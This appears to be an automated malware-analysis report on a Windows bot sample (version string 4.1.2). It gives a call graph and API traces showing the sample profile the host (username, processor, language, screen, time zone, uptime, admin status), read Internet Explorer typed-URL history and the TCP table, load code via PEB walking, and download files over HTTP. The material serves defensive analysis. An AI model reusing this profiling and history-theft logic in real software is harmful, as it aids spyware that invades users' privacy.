83523->83524 83525 2668ab0 8 API calls 83524->83525 83526 266862d 83525->83526 83527 2668ab0 8 API calls 83526->83527 83528 266863e 83527->83528 83529 2668ab0 8 API calls 83528->83529 83530 266864f 83529->83530 83531 2668ab0 8 API calls 83530->83531 83532 2668660 83531->83532 83533 2668ab0 8 API calls 83532->83533 83534 2668673 83533->83534 83535 2668ab0 8 API calls 83534->83535 83536 266868c 83535->83536 83537 2668ab0 8 API calls 83536->83537 83538 266869f 83537->83538 83539 2668ab0 8 API calls 83538->83539 83540 26686b2 83539->83540 83541 2668ab0 8 API calls 83540->83541 83542 26686c5 83541->83542 83543 2668ab0 8 API calls 83542->83543 83544 26686db 83543->83544 83545 2668ab0 8 API calls 83544->83545 83546 26686f1 83545->83546 83547 2668ab0 8 API calls 83546->83547 83548 2668707 83547->83548 83549 2668ab0 8 API calls 83548->83549 83550 2668717 83549->83550 83551 2668ab0 8 API calls 83550->83551 83552 266872c 83551->83552 83553 2668ab0 8 API calls 83552->83553 83554 2668741 83553->83554 83555 2668ab0 8 API calls 83554->83555 83556 2668754 83555->83556 83557 2668ab0 8 API calls 83556->83557 83558 2668765 83557->83558 83559 2668ab0 8 API calls 83558->83559 83560 2668776 83559->83560 83560->83415 83562 26474b5 CreateFileA 83561->83562 83563 26475e6 83561->83563 83562->83563 83564 26474d7 GetFileSizeEx 83562->83564 83565 26475ed IsBadWritePtr 83563->83565 83566 26475fc 83563->83566 83568 26474f5 83564->83568 83574 26475b5 83564->83574 83565->83566 83566->83084 83566->83085 83566->83087 83566->83088 83567 26475ca GetHandleInformation 83567->83563 83569 26475d9 83567->83569 83570 2647501 GetProcessHeap RtlAllocateHeap 83568->83570 83571 264752f 83568->83571 83569->83563 83572 26475df CloseHandle 83569->83572 83570->83571 83573 2647520 memset 83570->83573 83571->83574 83575 2647591 GetProcessHeap HeapValidate 83571->83575 83576 264754c SetFilePointer LockFile ReadFile UnlockFile 83571->83576 83572->83563 83573->83571 83574->83563 83574->83567 83575->83574 83577 26475a5 
GetProcessHeap HeapFree 83575->83577 83576->83574 83576->83575 83577->83574 83579 2646db4 83578->83579 83580 2646ce9 RegQueryValueExA 83578->83580 83581 2646dc2 83579->83581 83582 2646dbb RegCloseKey 83579->83582 83580->83579 83586 2646d10 83580->83586 83583 2646dd5 83581->83583 83647 2646b10 memset memset RegOpenKeyExA 83581->83647 83582->83581 83583->83092 83586->83579 83587 2646d73 GetProcessHeap HeapAlloc 83586->83587 83587->83579 83588 2646d8d memset 83587->83588 83588->83579 83589 2646da1 lstrcpynA 83588->83589 83589->83579 83591 2654f75 83590->83591 83592 2654b03 83590->83592 83591->83095 83592->83591 83593 2654bb0 InternetOpenA 83592->83593 83596 2654b1e GetProcessHeap HeapAlloc 83592->83596 83597 2654b49 83592->83597 83594 2654bd3 InternetConnectA 83593->83594 83595 2654f1a 83593->83595 83594->83595 83599 2654bf2 HttpOpenRequestA 83594->83599 83603 2654f27 GetProcessHeap HeapValidate 83595->83603 83604 2654f43 83595->83604 83600 2654b46 83596->83600 83601 2654b3a memset 83596->83601 83597->83591 83598 2654b54 memcpy 83597->83598 83619 2654b70 83598->83619 83599->83595 83607 2654c2a 83599->83607 83600->83597 83601->83600 83603->83604 83608 2654f37 GetProcessHeap HeapFree 83603->83608 83605 2654f55 83604->83605 83606 2654f4f InternetCloseHandle 83604->83606 83609 2654f5c InternetCloseHandle 83605->83609 83610 2654f5f 83605->83610 83606->83605 83611 2654c4e 83607->83611 83612 2654c3b HttpAddRequestHeadersA 83607->83612 83608->83604 83609->83610 83614 2654f66 InternetCloseHandle 83610->83614 83615 2654f69 83610->83615 83613 2654c51 HttpAddRequestHeadersA 83611->83613 83612->83613 83616 2654c96 HttpSendRequestA 83613->83616 83617 2654c66 _snprintf HttpAddRequestHeadersA 83613->83617 83614->83615 83615->83095 83616->83595 83620 2654cb8 HttpQueryInfoA 83616->83620 83617->83616 83619->83593 83620->83595 83621 2654cdb 83620->83621 83621->83595 83622 2654ce8 CreateFileA 83621->83622 83622->83595 83623 2654d16 83622->83623 83624 2665930 8 API calls 83623->83624 83625 
2654d1b 83624->83625 83626 2654d76 GetProcessHeap RtlAllocateHeap 83625->83626 83627 2654d1f ConvertStringSecurityDescriptorToSecurityDescriptorW 83625->83627 83628 2654d96 memset InternetReadFile 83626->83628 83629 2654e5a 83626->83629 83627->83626 83630 2654d36 GetSecurityDescriptorSacl 83627->83630 83631 2654dc5 83628->83631 83632 2654e3e GetProcessHeap HeapValidate 83628->83632 83633 2654e81 83629->83633 83634 2654e5e GetHandleInformation 83629->83634 83635 2654d57 SetNamedSecurityInfoA 83630->83635 83636 2654d6c LocalFree 83630->83636 83631->83632 83637 2654dcc 6 API calls 83631->83637 83632->83629 83638 2654e4e GetProcessHeap HeapFree 83632->83638 83640 26474a0 16 API calls 83633->83640 83634->83633 83639 2654e74 83634->83639 83635->83636 83636->83626 83637->83626 83641 2654e29 GetProcessHeap HeapFree 83637->83641 83638->83629 83639->83633 83642 2654e7a CloseHandle 83639->83642 83643 2654e91 83640->83643 83641->83626 83642->83633 83643->83595 83656 2647350 83643->83656 83645 2654efc GetProcessHeap HeapValidate 83645->83595 83646 2654f0c GetProcessHeap RtlFreeHeap 83645->83646 83646->83595 83648 2646c54 83647->83648 83649 2646b88 RegQueryValueExA 83647->83649 83650 2646c62 83648->83650 83651 2646c5b RegCloseKey 83648->83651 83649->83648 83652 2646baf 83649->83652 83650->83092 83651->83650 83652->83648 83653 2646c13 GetProcessHeap HeapAlloc 83652->83653 83653->83648 83654 2646c2d memset 83653->83654 83654->83648 83655 2646c41 lstrcpynA 83654->83655 83655->83648 83657 264748e 83656->83657 83658 264736b 83656->83658 83657->83645 83658->83657 83659 264737c CreateFileA 83658->83659 83659->83657 83660 264739e 83659->83660 83661 2665930 8 API calls 83660->83661 83662 26473a3 83661->83662 83663 26473a7 ConvertStringSecurityDescriptorToSecurityDescriptorW 83662->83663 83664 26473fe SetFilePointer LockFile WriteFile UnlockFile 83662->83664 83663->83664 83666 26473be GetSecurityDescriptorSacl 83663->83666 83665 2647449 SetEndOfFile 83664->83665 83667 2647459 83664->83667 
83665->83667 83668 26473f4 LocalFree 83666->83668 83669 26473df SetNamedSecurityInfoA 83666->83669 83670 2647467 GetHandleInformation 83667->83670 83671 2647483 83667->83671 83668->83664 83669->83668 83670->83671 83672 2647476 83670->83672 83671->83645 83672->83671 83673 264747c CloseHandle 83672->83673 83673->83671 83674 26479e0 NtQuerySystemInformation 83675 2647ae9 83674->83675 83676 2647a0f GetCurrentProcessId 83674->83676 83683 2664880 OpenProcess 83676->83683 83679 2647a1e GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 83680 2647a48 lstrcmpiA 83679->83680 83681 2647a62 83679->83681 83680->83675 83680->83681 83681->83675 83682 2647a80 memset _snprintf OpenMutexA 83681->83682 83682->83681 83684 2647a1a 83683->83684 83685 26648a5 OpenProcessToken 83683->83685 83684->83679 83684->83681 83686 2664952 GetHandleInformation 83685->83686 83687 26648ba GetTokenInformation 83685->83687 83686->83684 83689 2664968 83686->83689 83688 26648d4 CharUpperA 83687->83688 83695 2664902 83687->83695 83690 26648f0 83688->83690 83689->83684 83692 266496e CloseHandle 83689->83692 83693 2664904 CharUpperA 83690->83693 83690->83695 83691 2664936 GetHandleInformation 83691->83686 83694 2664945 83691->83694 83692->83684 83693->83695 83694->83686 83696 266494b CloseHandle 83694->83696 83695->83686 83695->83691 83696->83686 83697 2451360 83739 24511d0 83697->83739 83699 245136f GetPEB 83700 2451090 GetPEB 83699->83700 83701 2451394 83700->83701 83702 2451000 GetPEB 83701->83702 83703 24513a0 83702->83703 83704 2451090 GetPEB 83703->83704 83705 24513a6 83704->83705 83706 24513bc GetPEB 83705->83706 83707 2451619 83705->83707 83709 2451090 GetPEB 83706->83709 83708 2451000 GetPEB 83707->83708 83710 2451625 83708->83710 83713 24513d8 83709->83713 83711 2451090 GetPEB 83710->83711 83712 245162b 83711->83712 83713->83707 83714 2451000 GetPEB 83713->83714 83715 245141b 83714->83715 83716 2451090 GetPEB 83715->83716 83717 2451421 83716->83717 83718 2451000 GetPEB 83717->83718 83719 
2451441 83718->83719 83720 2451090 GetPEB 83719->83720 83721 2451447 VirtualAlloc 83720->83721 83721->83707 83722 2451460 83721->83722 83724 2451090 GetPEB 83722->83724 83728 2451000 GetPEB 83722->83728 83731 2451090 GetPEB 83722->83731 83734 245158c 83722->83734 83723 2451000 GetPEB 83725 24515bd 83723->83725 83724->83722 83726 2451090 GetPEB 83725->83726 83727 24515c3 83726->83727 83729 24512c0 GetPEB 83727->83729 83728->83722 83730 24515de 83729->83730 83730->83707 83733 2451000 GetPEB 83730->83733 83732 245150f LoadLibraryExA 83731->83732 83732->83722 83735 2451608 83733->83735 83734->83723 83736 2451090 GetPEB 83735->83736 83737 245160e 83736->83737 83738 26577c0 2147 API calls 83737->83738 83738->83707 83741 24511d5 83739->83741 83742 2667819 83744 2667771 83742->83744 83743 26678ab 83744->83743 83745 26677ac memcpy 83744->83745 83746 2668eb0 2 API calls 83744->83746 83745->83744 83746->83744

Control-flow Graph

[Figure omitted: control-flow graph of the routine starting at 2644b00. Legend: Executed / Not Executed.]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,0269D3A4,75775CE0), ref: 02644C37
                                                                                                                                                                                                                • Part of subcall function 026659D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                                • Part of subcall function 026659D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                                • Part of subcall function 026659D0: SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                                • Part of subcall function 026659D0: LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 02644C5E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02644C6F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02643F9D,00000000), ref: 02644C7F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02644C90
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644CA4
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02644CB1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 02644CC1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02644CD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644CE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644CF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644D03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02644D14
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02644D28
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644D3C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02644D49
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02644D59
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02644D6A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644D9C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644DAB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02644DBF
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02644DD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644DE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644DF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644E03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644E14
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 02644E25
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02644E46
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02644E56
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02644E67
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644E92
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644EA1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02644EB5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644EC8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644EDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644EE9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644EF9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644F0A
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02644F21
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644F35
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02644F42
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02644F52
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02644F63
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644F8E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644F9D
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02644FB1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644FC4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644FD8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644FE5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644FF5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645006
                                                                                                                                                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 0264500C
                                                                                                                                                                                                              • memset.MSVCRT ref: 02645026
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645093
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 026450A0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 026450B0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 026450C1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026450EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 026450FB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0264510F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645122
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645136
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645143
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02645153
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645164
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0264516E
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 02645175
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 0264517E
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 02645187
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264519F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026451B6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 026451C3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 026451D3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 026451E4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0264520F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0264521E
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02645232
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645245
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645259
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645266
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02645276
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645287
                                                                                                                                                                                                              • GetDateFormatA.KERNELBASE(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 026452A7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026452BB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 026452C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 026452D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 026452E9
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645314
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645323
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02645337
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0264534A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0264535E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 0264536B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 0264537B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 0264538C
                                                                                                                                                                                                              • GetTimeFormatA.KERNELBASE(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 026453AC
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026453C0
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 026453CD
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 026453DD
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 026453EE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0264541C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0264542B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0264543F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645452
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645466
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645473
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02645483
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645494
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?), ref: 026454A1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02645502
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645519
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02645526
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02645536
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02645547
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645572
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645581
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02645595
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 026455A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026455BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026455C9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 026455D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026455EA
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026455FE
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 0264560B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 0264561B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 0264562C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0264566C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264567B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264568C
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0264569F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026456B3
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026456C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 026456D0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026456E1
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 026456F3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645707
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02645714
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02645724
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02645735
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645760
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0264576F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02645783
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645796
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026457AA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026457B7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 026457C7
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026457D8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026457EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 026457F9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02645809
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 0264581A
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02645820
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02645843
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645875
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02645884
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02645895
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 026458A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026458BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026458C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 026458D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026458E6
                                                                                                                                                                                                                • Part of subcall function 02644900: RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02644925
                                                                                                                                                                                                                • Part of subcall function 02644900: _snprintf.MSVCRT ref: 0264494D
                                                                                                                                                                                                                • Part of subcall function 02644900: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000000,76F93490), ref: 02644987
                                                                                                                                                                                                                • Part of subcall function 02644900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026449A9
                                                                                                                                                                                                                • Part of subcall function 02644900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 026449B5
                                                                                                                                                                                                                • Part of subcall function 02644900: WriteFile.KERNEL32(00000000,IE history:,0000000C,026458F1,00000000), ref: 026449C9
                                                                                                                                                                                                                • Part of subcall function 02644900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 026449D7
                                                                                                                                                                                                                • Part of subcall function 02644900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026449EB
                                                                                                                                                                                                                • Part of subcall function 02644900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 026449F7
                                                                                                                                                                                                                • Part of subcall function 02644900: WriteFile.KERNEL32(00000000,02685C1C,00000001,00000000,00000000), ref: 02644A0B
                                                                                                                                                                                                                • Part of subcall function 02644900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02644A19
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,76F93490), ref: 0264419D
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapAlloc.KERNEL32(00000000), ref: 026441A0
                                                                                                                                                                                                                • Part of subcall function 02644180: memset.MSVCRT ref: 026441B4
                                                                                                                                                                                                                • Part of subcall function 02644180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02644224
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644232
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapValidate.KERNEL32(00000000), ref: 02644235
